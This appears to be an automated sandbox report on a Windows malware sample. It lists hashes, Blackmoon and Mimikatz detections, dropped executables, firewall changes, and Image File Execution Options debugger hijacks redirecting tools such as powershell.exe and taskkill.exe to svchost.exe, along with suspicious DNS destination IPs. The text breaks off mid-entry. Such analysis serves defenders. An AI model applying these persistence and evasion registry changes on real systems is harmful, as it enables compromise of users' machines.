Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
23-09-2024 00:32
Behavioral task
behavioral1
Sample
53a499620d70d7f48dde9b3ba0468551093f41a9646371ea4711eb91086d15e7N.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
53a499620d70d7f48dde9b3ba0468551093f41a9646371ea4711eb91086d15e7N.exe
Resource
win10v2004-20240802-en
General
-
Target
53a499620d70d7f48dde9b3ba0468551093f41a9646371ea4711eb91086d15e7N.exe
-
Size
9.7MB
-
MD5
7cb75c4d81cc0728ddef260d68ceb3b0
-
SHA1
a7ff4e1ba9a35c263fd2594b80f8d2b1cf752b7e
-
SHA256
53a499620d70d7f48dde9b3ba0468551093f41a9646371ea4711eb91086d15e7
-
SHA512
99649f205ee51b4c0bc99dfb57bb383856c185a0994472726ceaaa136f9a5638aa14af0ac8e10ebe85f218be64512878ce9b970c192e0c63ccf86043ffdbe231
-
SSDEEP
196608:K2c1uwl1CPwDv3uFhi43v13uFnCPws8S/VW08Sr8lQeY3YgOFmknGzwHIPHd9DPK:KnEwl1CPwDv3uFY43v13uFnCPwa/VW0E
Malware Config
Signatures
-
Detect Blackmoon payload 6 IoCs
Processes:
resource yara_rule behavioral1/memory/2332-0-0x0000000000400000-0x0000000000D0F000-memory.dmp family_blackmoon behavioral1/memory/2332-12-0x0000000000400000-0x0000000000D0F000-memory.dmp family_blackmoon behavioral1/files/0x0007000000015ec9-24.dat family_blackmoon behavioral1/memory/2872-28-0x0000000000400000-0x0000000000D0F000-memory.dmp family_blackmoon behavioral1/memory/2672-61-0x0000000000400000-0x0000000000469000-memory.dmp family_blackmoon behavioral1/memory/2672-64-0x0000000000400000-0x0000000000469000-memory.dmp family_blackmoon -
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
mimikatz is an open source tool to dump credentials on Windows 4 IoCs
Processes:
resource yara_rule behavioral1/memory/2332-0-0x0000000000400000-0x0000000000D0F000-memory.dmp mimikatz behavioral1/memory/2332-12-0x0000000000400000-0x0000000000D0F000-memory.dmp mimikatz behavioral1/files/0x0007000000015ec9-24.dat mimikatz behavioral1/memory/2872-28-0x0000000000400000-0x0000000000D0F000-memory.dmp mimikatz -
Drops file in Drivers directory 1 IoCs
Processes:
bcvnbib.exedescription ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts bcvnbib.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 44 IoCs
Processes:
bcvnbib.exedescription ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe bcvnbib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bcvnbib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe bcvnbib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bcvnbib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe bcvnbib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bcvnbib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe bcvnbib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bcvnbib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe bcvnbib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\schtasks.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bcvnbib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bcvnbib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bcvnbib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe bcvnbib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bcvnbib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bcvnbib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe bcvnbib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe bcvnbib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe bcvnbib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe bcvnbib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe bcvnbib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe bcvnbib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe bcvnbib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe bcvnbib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bcvnbib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe bcvnbib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cacls.exe bcvnbib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bcvnbib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\schtasks.exe bcvnbib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe bcvnbib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe bcvnbib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bcvnbib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bcvnbib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bcvnbib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bcvnbib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bcvnbib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bcvnbib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe bcvnbib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bcvnbib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bcvnbib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bcvnbib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bcvnbib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe bcvnbib.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe bcvnbib.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" bcvnbib.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
Processes:
netsh.exenetsh.exepid Process 2696 netsh.exe 2520 netsh.exe -
Executes dropped EXE 13 IoCs
Processes:
hentai.exevmtrwm.exebcvnbib.exehentai.exebcvnbib.exehentai.exevregocwxcwkxvjh21957.exebcvnbib.exehentai.exebcvnbib.exehentai.exebcvnbib.exehentai.exepid Process 784 hentai.exe 2580 vmtrwm.exe 2872 bcvnbib.exe 2900 hentai.exe 2480 bcvnbib.exe 2912 hentai.exe 2672 vregocwxcwkxvjh21957.exe 1772 bcvnbib.exe 812 hentai.exe 2560 bcvnbib.exe 2148 hentai.exe 2184 bcvnbib.exe 812 hentai.exe -
Loads dropped DLL 16 IoCs
Processes:
53a499620d70d7f48dde9b3ba0468551093f41a9646371ea4711eb91086d15e7N.execmd.exebcvnbib.exebcvnbib.exebcvnbib.exebcvnbib.exebcvnbib.exepid Process 2332 53a499620d70d7f48dde9b3ba0468551093f41a9646371ea4711eb91086d15e7N.exe 2332 53a499620d70d7f48dde9b3ba0468551093f41a9646371ea4711eb91086d15e7N.exe 2920 cmd.exe 2920 cmd.exe 2872 bcvnbib.exe 2872 bcvnbib.exe 2480 bcvnbib.exe 2480 bcvnbib.exe 2480 bcvnbib.exe 2480 bcvnbib.exe 1772 bcvnbib.exe 1772 bcvnbib.exe 2560 bcvnbib.exe 2560 bcvnbib.exe 2184 bcvnbib.exe 2184 bcvnbib.exe -
Processes:
resource yara_rule behavioral1/files/0x0007000000016d2e-58.dat upx behavioral1/memory/2672-61-0x0000000000400000-0x0000000000469000-memory.dmp upx behavioral1/memory/2480-57-0x0000000010000000-0x000000001000B000-memory.dmp upx behavioral1/memory/2672-64-0x0000000000400000-0x0000000000469000-memory.dmp upx -
Unexpected DNS network traffic destination 60 IoCs
Network traffic to other servers than the configured DNS servers was detected on the DNS port.
Processes:
description ioc Destination IP 207.192.71.13 Destination IP 178.63.116.152 Destination IP 142.4.204.111 Destination IP 159.203.38.175 Destination IP 198.100.148.224 Destination IP 188.226.146.136 Destination IP 178.63.116.152 Destination IP 51.75.173.177 Destination IP 165.227.40.43 Destination IP 165.227.40.43 Destination IP 161.97.219.84 Destination IP 161.97.219.84 Destination IP 163.172.168.171 Destination IP 159.203.38.175 Destination IP 188.226.146.136 Destination IP 66.70.228.164 Destination IP 104.128.239.75 Destination IP 13.239.157.177 Destination IP 207.148.83.241 Destination IP 51.77.227.84 Destination IP 51.75.173.177 Destination IP 5.132.191.104 Destination IP 13.239.157.177 Destination IP 66.70.228.164 Destination IP 208.87.98.37 Destination IP 178.63.116.152 Destination IP 5.132.191.104 Destination IP 207.192.71.13 Destination IP 207.148.83.241 Destination IP 165.227.40.43 Destination IP 198.100.148.224 Destination IP 208.87.98.37 Destination IP 163.172.168.171 Destination IP 79.124.7.81 Destination IP 79.124.7.81 Destination IP 144.76.103.143 Destination IP 144.76.103.143 Destination IP 161.97.219.84 Destination IP 94.103.153.176 Destination IP 142.4.204.111 Destination IP 142.4.205.47 Destination IP 51.77.227.84 Destination IP 207.148.83.241 Destination IP 163.172.168.171 Destination IP 51.77.227.84 Destination IP 104.128.239.75 Destination IP 79.124.7.81 Destination IP 198.100.148.224 Destination IP 159.203.38.175 Destination IP 207.192.71.13 Destination IP 51.75.173.177 Destination IP 142.4.205.47 Destination IP 142.4.204.111 Destination IP 142.4.205.47 Destination IP 94.103.153.176 Destination IP 188.226.146.136 Destination IP 144.76.103.143 Destination IP 94.103.153.176 Destination IP 13.239.157.177 Destination IP 66.70.228.164 -
Processes:
bcvnbib.exedescription ioc Process Delete value \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger bcvnbib.exe -
Creates a Windows Service
-
Drops file in System32 directory 3 IoCs
Processes:
hentai.exebcvnbib.exedescription ioc Process File created C:\Windows\SysWOW64\vmtrwm.exe hentai.exe File opened for modification C:\Windows\SysWOW64\vmtrwm.exe hentai.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat bcvnbib.exe -
Drops file in Windows directory 5 IoCs
Processes:
bcvnbib.exe53a499620d70d7f48dde9b3ba0468551093f41a9646371ea4711eb91086d15e7N.exedescription ioc Process File created C:\Windows\Fonts\bcvnbib.exe bcvnbib.exe File opened for modification C:\Windows\Fonts\bcvnbib.exe bcvnbib.exe File created C:\Windows\gbmitiih\bcvnbib.exe 53a499620d70d7f48dde9b3ba0468551093f41a9646371ea4711eb91086d15e7N.exe File opened for modification C:\Windows\gbmitiih\bcvnbib.exe 53a499620d70d7f48dde9b3ba0468551093f41a9646371ea4711eb91086d15e7N.exe File created C:\Windows\gbmitiih\vregocwxcwkxvjh21957.exe bcvnbib.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exepid Process 2644 sc.exe 2664 sc.exe 2904 sc.exe 2960 sc.exe -
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
Processes:
netsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exedescription ioc Process Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
cmd.exenetsh.exenet.exenslookup.exehentai.exeschtasks.exenslookup.exebcvnbib.execmd.exesc.exenetsh.exenslookup.execmd.exenet.execmd.exenetsh.execmd.exehentai.exenetsh.execmd.exenslookup.execmd.execmd.exenetsh.exenet.execmd.exenslookup.exenetsh.exenetsh.exe53a499620d70d7f48dde9b3ba0468551093f41a9646371ea4711eb91086d15e7N.execmd.exenetsh.execmd.exenetsh.execmd.execmd.exenslookup.exenetsh.execmd.exenslookup.exenslookup.exehentai.exenet1.exebcvnbib.execmd.execmd.exenslookup.exenetsh.exesc.exenslookup.exenslookup.exenetsh.exenet1.exebcvnbib.exenslookup.execmd.exenslookup.execmd.exenetsh.execmd.execmd.execmd.exehentai.execmd.exedescription ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nslookup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language hentai.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nslookup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bcvnbib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nslookup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language hentai.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nslookup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nslookup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 53a499620d70d7f48dde9b3ba0468551093f41a9646371ea4711eb91086d15e7N.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nslookup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nslookup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nslookup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language hentai.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bcvnbib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nslookup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nslookup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nslookup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language bcvnbib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nslookup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nslookup.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language hentai.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes:
cmd.exePING.EXEpid Process 2920 cmd.exe 2192 PING.EXE -
NSIS installer 1 IoCs
Processes:
resource yara_rule behavioral1/files/0x0007000000015ec9-24.dat nsis_installer_2 -
Modifies data under HKEY_USERS 57 IoCs
Processes:
netsh.exenetsh.exenetsh.exebcvnbib.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exenetsh.exedescription ioc Process Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-100 = "DHCP Quarantine Enforcement Client" netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{74C95E65-F65E-41E9-B96C-19C91BB3395D}\0a-55-95-89-9e-a2 bcvnbib.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-2 = "Provides IPsec based enforcement for Network Access Protection" netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 netsh.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 bcvnbib.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-101 = "Provides DHCP based enforcement for NAP" netsh.exe Set value 